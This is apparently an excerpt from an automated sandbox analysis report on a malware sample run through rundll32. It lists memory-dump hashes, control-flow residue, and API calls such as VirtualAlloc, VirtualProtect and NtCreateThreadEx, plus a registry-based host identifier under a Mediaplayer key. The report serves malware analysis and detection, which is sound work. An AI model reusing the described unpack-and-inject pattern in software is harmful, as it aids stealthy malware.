                    • Opcode Fuzzy Hash: 224643889a938e8c6bda6f687b6b7ef9da2da3e5ab05ad7be0ff68abec53681e
                    • Instruction Fuzzy Hash: 9CB29F726087828FD774CF29C9847EAB7E6BBC9310F158A1DE499CB794DB309845CB42
                    APIs
                    • VirtualAlloc.KERNEL32(00000000,?,?,?), ref: 0533E679
                    • VirtualAlloc.KERNEL32(00000000,?,?,?), ref: 0533F73C
                    Memory Dump Source
                    • Source File: 00000003.00000003.84148886109.000000000533D000.00000020.00001000.00020000.00000000.sdmp, Offset: 0533D000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_533d000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 4ef5e6f3f24ca39d9c83c0dc6a6c31688bf2c78410e3a90c5f5409f422b3077b
                    • Instruction ID: ab8d154e5ab71a9009f86f2eddfa90f5c5139a17c23431d389af383ff0ebf8ac
                    • Opcode Fuzzy Hash: 4ef5e6f3f24ca39d9c83c0dc6a6c31688bf2c78410e3a90c5f5409f422b3077b
                    • Instruction Fuzzy Hash: FD031A36A047618FD728CE29C4D57DAB3E7BFC4310F498A3DD889CB645DB7498498B81
                    APIs
                    • FindNextFileW.KERNEL32(?,?), ref: 0696DCD2
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: FileFindNext
                    • String ID: L
                    • API String ID: 2029273394-2909332022
                    • Opcode ID: 67f8e1e1a47774552d9918b939aecb38e07befeb6cb6882da394a71afff741f8
                    • Instruction ID: f04b1c3b8ef5cb55aa165d70aa29760f923ae8b15c9cfb04efb28b402ea31c83
                    • Opcode Fuzzy Hash: 67f8e1e1a47774552d9918b939aecb38e07befeb6cb6882da394a71afff741f8
                    • Instruction Fuzzy Hash: 6D91AD32A087518FD710CF29C88065AB7E2FFC9314F268A29E9A59B354D774F806CB91
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: D$t
                    • API String ID: 0-777169037
                    • Opcode ID: 00ee968eb86e2acb1b7c73acc9403356742f36b71a7702d82bfe09c9aa654095
                    • Instruction ID: 1ea99a5e842f0cb3f85edfa571bc5079391d23af38146fdca83d855725d3d77b
                    • Opcode Fuzzy Hash: 00ee968eb86e2acb1b7c73acc9403356742f36b71a7702d82bfe09c9aa654095
                    • Instruction Fuzzy Hash: CE8261326193818FD774CF29C5C4BAEB7E6BFC9310F258A2DD4898B654DB30A945CB81
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID: 'RX0
                    • API String ID: 3472027048-656561589
                    • Opcode ID: b46c6020b1f91a003066ea05d460942125ac22ade54cf7140133a1bb6b291a75
                    • Instruction ID: 2b9f4095d769748cdb81313943a5950ead8d42f7a9b2fbe37e4ec11c615641cd
                    • Opcode Fuzzy Hash: b46c6020b1f91a003066ea05d460942125ac22ade54cf7140133a1bb6b291a75
                    • Instruction Fuzzy Hash: 0471AA76A183508FD304DF39C89051BBBE3BBD9310F1A8929E595D7354DA30E942CBD2

                    Control-flow Graph

                    • Executed / Not Executed colouring (not recoverable from the extracted text)
                    control_flow_graph (figure residue; only the block address ranges, callees and API labels are recoverable): basic blocks 50922a8-509236d and 5091d18-5091e8a; calls 50947a8; API labels VirtualProtect, VirtualAlloc
                    APIs
                    • VirtualAlloc.KERNEL32(?,?,?,?,?,-00000001,-00000001), ref: 05091DAA
                    • VirtualProtect.KERNEL32(?,00000800,?,?), ref: 0509235A
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974132495.0000000005091000.00000020.00001000.00020000.00000000.sdmp, Offset: 05091000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_5091000_rundll32.jbxd
                    Similarity
                    • API ID: Virtual$AllocProtect
                    • String ID:
                    • API String ID: 2447062925-0
                    • Opcode ID: e3d0b00510a6c716ea44dc0f727e4e475cbbcd87a214dbe7fa62648bb9f1230c
                    • Instruction ID: efd2b076cce1660b0478bb018419da48feeab4533cbbc30e8377d8e5dcfec124
                    • Opcode Fuzzy Hash: e3d0b00510a6c716ea44dc0f727e4e475cbbcd87a214dbe7fa62648bb9f1230c
                    • Instruction Fuzzy Hash: 4761A1726083418FD718CF29C844BAAFBE6FBD5310F15CA6ED099CB3A5DA349506CB51
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a169decebb04fcb7fdcaccf8f336471ad5d269e727fc6404a969b3606431e339
                    • Instruction ID: 07bd4ed7a633524775492ad3c0ea3a1d29bd4a78343c834e2a00e8b47d7ef755
                    • Opcode Fuzzy Hash: a169decebb04fcb7fdcaccf8f336471ad5d269e727fc6404a969b3606431e339
                    • Instruction Fuzzy Hash: 85B2F636A183518FD778CF29C9C47DAF7E6BBC8310F198A2DD489CB644DB74A9058B81
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID:
                    • API String ID: 1029625771-0
                    • Opcode ID: 48e0eabbb4ae28cc54ba223bbad3ab6ebf4dd52f885b0bcd90a142c3ea5cda38
                    • Instruction ID: 35b1eaec45828559de800337ec6d7eef1f433cc138a7144b5b881c89fa5920cd
                    • Opcode Fuzzy Hash: 48e0eabbb4ae28cc54ba223bbad3ab6ebf4dd52f885b0bcd90a142c3ea5cda38
                    • Instruction Fuzzy Hash: 04F18E72D002298BDB24CF29C8407ADB7B2FF89310F2581AAD549B7754D774AE86CF90
                    APIs
                    • RegOpenKeyExW.KERNEL32(?,?,?,?,?), ref: 069850C4
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: Open
                    • String ID:
                    • API String ID: 71445658-0
                    • Opcode ID: 07ba154feed452149765af5d8f88be256ab3c9b9ef3414ed4a3e84978e7b9a31
                    • Instruction ID: 331e8aec502243bc3082f92fad95a080fba73263fbb36bc4583b3598dd2af1a2
                    • Opcode Fuzzy Hash: 07ba154feed452149765af5d8f88be256ab3c9b9ef3414ed4a3e84978e7b9a31
                    • Instruction Fuzzy Hash: B8A1A837A186518FD764DF29C48065AF7E2BFC8310F16896DE999AB364DB30EC05CB81
                    APIs
                    • RegQueryValueExW.KERNEL32(?,?,?,?,?,?), ref: 0696C871
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: QueryValue
                    • String ID:
                    • API String ID: 3660427363-0
                    • Opcode ID: 788919a6737212ca35df3920784e08da19885da45767fffcd0d019ef971503aa
                    • Instruction ID: c354761f709ce8db2817b260eb018ce3ebff42a28b3ca72e02f6340dd9c97159
                    • Opcode Fuzzy Hash: 788919a6737212ca35df3920784e08da19885da45767fffcd0d019ef971503aa
                    • Instruction Fuzzy Hash: B0A18F76A08751CFD724CF29C880A6AB7E2FFC8310F56892DE5959B364D731B906CB81
                    APIs
                    • NtQueryDirectoryObject.NTDLL(?,?,?,?,?,?,?), ref: 069668F2
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: DirectoryObjectQuery
                    • String ID:
                    • API String ID: 1728361593-0
                    • Opcode ID: 9604ca454e3b85f1d9d02cf78795dabdbda044f066ac707dbc01df5cce46ee91
                    • Instruction ID: 67326aa633061c65d85705d60e5280bd9ca62be0f1b31450fc133d1ed2bcb72f
                    • Opcode Fuzzy Hash: 9604ca454e3b85f1d9d02cf78795dabdbda044f066ac707dbc01df5cce46ee91
                    • Instruction Fuzzy Hash: BB817136A087518FD714CF2AC84066BF7E3BBC9314F158A2DE99597364DA71EC06CB82
                    APIs
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 06962400
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: fcccb4885bc07a5ef542f2356ae95b7f5855203db94123c3575300d7f0a00fd2
                    • Instruction ID: 35202aba8141b5f33280676c99fb208c77d1cc57297f8763dba197936e9bad16
                    • Opcode Fuzzy Hash: fcccb4885bc07a5ef542f2356ae95b7f5855203db94123c3575300d7f0a00fd2
                    • Instruction Fuzzy Hash: 30914A36E002198FDB14CFAAC8409DEB7B7BBC8314F66816AD455BB615DB31AD46CF80
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: CloseFind
                    • String ID:
                    • API String ID: 1863332320-0
                    • Opcode ID: ac8bd1260cc08786d6420d79abb257bce1753f8d82768ff65909674cbcebbea3
                    • Instruction ID: 28f56903a2f0654aa7b6cd8adfea7471956ed3acb2ec31756ac44533468facb1
                    • Opcode Fuzzy Hash: ac8bd1260cc08786d6420d79abb257bce1753f8d82768ff65909674cbcebbea3
                    • Instruction Fuzzy Hash: D9913976E00619CFDB14CFA9C8405AEFBB2BF88310F2A855AE455BB355D730A946CF90

                    Control-flow Graph

                    • Executed / Not Executed colouring (not recoverable from the extracted text)
                    control_flow_graph (figure residue; only the block address range and API label are recoverable): basic blocks 51ba660-51ba8f7; API label VirtualAllocExNuma
                    APIs
                    • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?), ref: 051BA78C
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID: AllocNumaVirtual
                    • String ID:
                    • API String ID: 4233825816-0
                    • Opcode ID: cc17bf8bf7b8521daabe671ef5e95a176c2ff15e2fd192ffce3c66b18d0aa888
                    • Instruction ID: d285df8dd59fb3da003eac478e2f14e8ef18771674ce14f6dcd3a6f3bef4465b
                    • Opcode Fuzzy Hash: cc17bf8bf7b8521daabe671ef5e95a176c2ff15e2fd192ffce3c66b18d0aa888
                    • Instruction Fuzzy Hash: 6571D4766183408FD728CF29D891AABB7E2BFC8310F15891DE595C7390DB75E805CB81

                    Control-flow Graph

                    • Executed / Not Executed colouring (not recoverable from the extracted text)
                    control_flow_graph (figure residue; only the block address range and API label are recoverable): basic blocks 51ba900-51baba2; API label VirtualProtect
                    APIs
                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 051BAA5A
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID:
                    • API String ID: 544645111-0
                    • Opcode ID: f324245993c85820f50afd8322b93ed0ad540b5f9b4c567e25ce2ae0dba8eef2
                    • Instruction ID: 564176bf3ea4ed97f23950869488665b3473f20138b1bc0729af61bf60139704
                    • Opcode Fuzzy Hash: f324245993c85820f50afd8322b93ed0ad540b5f9b4c567e25ce2ae0dba8eef2
                    • Instruction Fuzzy Hash: E371A07A6083418FD324CF29D98059BB7E3FFC8314F568A2DE48997354EB70A906CB91
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: Close
                    • String ID:
                    • API String ID: 3535843008-0
                    • Opcode ID: 767198e3a11f2a2df5bec3a3536b6e1c9a3c2f5e4e34b5e356eb149fd948a2ad
                    • Instruction ID: cd7052099c26d4cc35d7c71df7b93b020ba961cacb2636ff7a516d039ba10a96
                    • Opcode Fuzzy Hash: 767198e3a11f2a2df5bec3a3536b6e1c9a3c2f5e4e34b5e356eb149fd948a2ad
                    • Instruction Fuzzy Hash: 7F5180326487418FD714DF2AD98052BB7E3BBC8310F258A2DF1D587798DA74E842CB92
                    APIs
                    • DeviceIoControl.KERNEL32(?,?,?,?,?,?,?,?), ref: 0695D5E0
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: ControlDevice
                    • String ID:
                    • API String ID: 2352790924-0
                    • Opcode ID: ffc4dcd6f373af87793254392fd7652a2e6a5d6824dc7a3e7dcb572dd0120fa5
                    • Instruction ID: 22faf08eb32000c1cd260d775dc977f9e41d1c646f424082351313f12b7fe585
                    • Opcode Fuzzy Hash: ffc4dcd6f373af87793254392fd7652a2e6a5d6824dc7a3e7dcb572dd0120fa5
                    • Instruction Fuzzy Hash: E451B3326092428FC324CF28C890AAAB7F3FFD9314F66851DE59587654DB35E85BCB42

                    Control-flow Graph

                    • Executed / Not Executed colouring (not recoverable from the extracted text)
                    control_flow_graph (figure residue; only the block address ranges and API label are recoverable): basic blocks 51b2084-51b2299 and 51b205c-51b207f; API label NtCreateThreadEx
                    APIs
                    • NtCreateThreadEx.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?), ref: 051B20D8
                    Memory Dump Source
                    • Source File: 00000003.00000002.84974409517.00000000051B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 051B1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_51b1000_rundll32.jbxd
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: 3dbb75f47456da23a5d8d384a929dbb8fe954c1872de9d0006430f73d7cc1b54
                    • Instruction ID: e04350555c6d3f137816e0de26e1da28286cc2f90bcc7a64a1384392588c2ea2
                    • Opcode Fuzzy Hash: 3dbb75f47456da23a5d8d384a929dbb8fe954c1872de9d0006430f73d7cc1b54
                    • Instruction Fuzzy Hash: 2E614B76A10129DFDB14CFA8CC81ADDBBB3BF88210F168195D559BB210DB70A985CF80
                    APIs
                    • RegEnumKeyExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0696A600
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: Enum
                    • String ID:
                    • API String ID: 2928410991-0
                    • Opcode ID: 672eff21dba37621b949097737f1f096509734d17498992a3e7b2677e9444d13
                    • Instruction ID: 2ca12c0d37bc07a3158724b526b21e46a67edb26fd2088bd23edeeb6805162e4
                    • Opcode Fuzzy Hash: 672eff21dba37621b949097737f1f096509734d17498992a3e7b2677e9444d13
                    • Instruction Fuzzy Hash: FD515C72E10219CFDB54CFA9C940AADBBB2FF88310F268159E559BB245D730AD51CF90
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 06982A9E
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 94eb86fb9bac9cdde7928f82997da02ea2350c75b42e5cdf1ee264ddfd476bff
                    • Instruction ID: 4ca151decd8a9663008c9cdf680b86b59c72fc01ce5c56363ede114f14a5d86e
                    • Opcode Fuzzy Hash: 94eb86fb9bac9cdde7928f82997da02ea2350c75b42e5cdf1ee264ddfd476bff
                    • Instruction Fuzzy Hash: 2651B232908211CFC760DF28C480A5AB7F2FF99314F19896DE9989B265D335FD02CB82
                    APIs
                    • CreateThread.KERNEL32(?,?,?,?,?,?), ref: 06966CFA
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e90dffc27ac4932d04492c911b58c3b01644892d9c56e9814cf45e1f888d8b46
                    • Instruction ID: c7bf4f9324376f4831b6c2e8689a4f833257a736343a690b3a05ffcba13926ef
                    • Opcode Fuzzy Hash: e90dffc27ac4932d04492c911b58c3b01644892d9c56e9814cf45e1f888d8b46
                    • Instruction Fuzzy Hash: 3181A437B547114BD728CE79CD8429AB6D3ABC8314F1AC63D8949E7748DEB4A8068A80
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6928c3a09929bd641140b3e9af8e2ced4354271718ea13005c5f4ca2d1b71926
                    • Instruction ID: 04f8dfc270bd8da0d6ca705809fa9b5fae2a8af6134275e9af1a6ae11267abc4
                    • Opcode Fuzzy Hash: 6928c3a09929bd641140b3e9af8e2ced4354271718ea13005c5f4ca2d1b71926
                    • Instruction Fuzzy Hash: 5D815A72608351CFD360CF29C880B9BF7E6FF89314F158969E985DB254D730A845CB92

                    Control-flow Graph

                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00009088), ref: 27AC18D7
                    • WaitForSingleObject.KERNEL32(00000000), ref: 27AC18DE
                      • Part of subcall function 27AC1120: GetTickCount.KERNEL32 ref: 27AC116C
                      • Part of subcall function 27AC1120: SHGetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,?,?), ref: 27AC11B9
                      • Part of subcall function 27AC1120: SHSetValueA.SHLWAPI(80000001,SOFTWARE\Microsoft\Mediaplayer,COMPUTERNAME,00000001,?), ref: 27AC11E0
                      • Part of subcall function 27AC1120: UuidCreateSequential.RPCRT4(?), ref: 27AC11F5
                      • Part of subcall function 27AC1120: sprintf.NTDLL ref: 27AC122C
                      • Part of subcall function 27AC1120: RtlComputeCrc32.NTDLL(00000000,?,00000000), ref: 27AC124F
                      • Part of subcall function 27AC1120: GlobalAlloc.KERNEL32(00000040,00001000,00000000,?,00000000), ref: 27AC1266
                      • Part of subcall function 27AC1120: sprintf.NTDLL ref: 27AC128C
                    • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 27AC18EC
                    Memory Dump Source
                    • Source File: 00000003.00000002.84975565291.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
                    Similarity
                    • API ID: CreateValuesprintf$AllocComputeCountCrc32EventGlobalObjectProcessSequentialSingleTerminateTickUuidWait
                    • API String ID: 3103566969-0

                    Control-flow Graph
                    • Blocks: 343 32e1eb1-32e1f0d (VirtualProtect), 344 32e2067-32e208f, 345 32e1fcb-32e2034 (call 32e14a3), 346 32e2095
                    • Edges: 343->344, 344->345, 344->346, 345->344
                    Memory Dump Source
                    • Source File: 00000003.00000002.84973434581.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32e0000_rundll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • String ID: X
                    • API String ID: 544645111-3081909835

                    Control-flow Graph

                    Memory Dump Source
                    • Source File: 00000003.00000002.84973434581.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32e0000_rundll32.jbxd
                    Similarity
                    • API ID: ProtectVirtual
                    • API String ID: 544645111-0

                    Control-flow Graph
                    • Blocks: 460 27ac18f6-27ac1908 (CreateThread)
                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,Function_000008CB,00000000,00000000,00000000), ref: 27AC1902
                    Memory Dump Source
                    • Source File: 00000003.00000002.84975565291.0000000027AC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 27AC1000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_27ac1000_rundll32.jbxd
                    Similarity
                    • API ID: CreateThread
                    • API String ID: 2422867632-0
                    Memory Dump Source
                    • Source File: 00000003.00000002.84973434581.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_32e0000_rundll32.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • API String ID: 4275171209-0
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • String ID: R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*$R*R*R*R*$R*R*R*R*
                    • API String ID: 0-1454091619
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • String ID: R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*$R*
                    • API String ID: 0-467962880
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • String ID: &Fd
                    • API String ID: 0-2012438766
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • String ID: UR
                    • API String ID: 0-2961163533
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180784691.0000000006931000.00000020.00001000.00020000.00000000.sdmp, Offset: 06931000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6931000_rundll32.jbxd
                    Similarity
                    • String ID: M
                    • API String ID: 0-3664761504
                    Memory Dump Source
                    • Source File: 00000003.00000003.84180388238.0000000006831000.00000020.00001000.00020000.00000000.sdmp, Offset: 06831000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_3_6831000_rundll32.jbxd
                    Similarity
                    • String ID: Y
                    • API String ID: 0-3233089245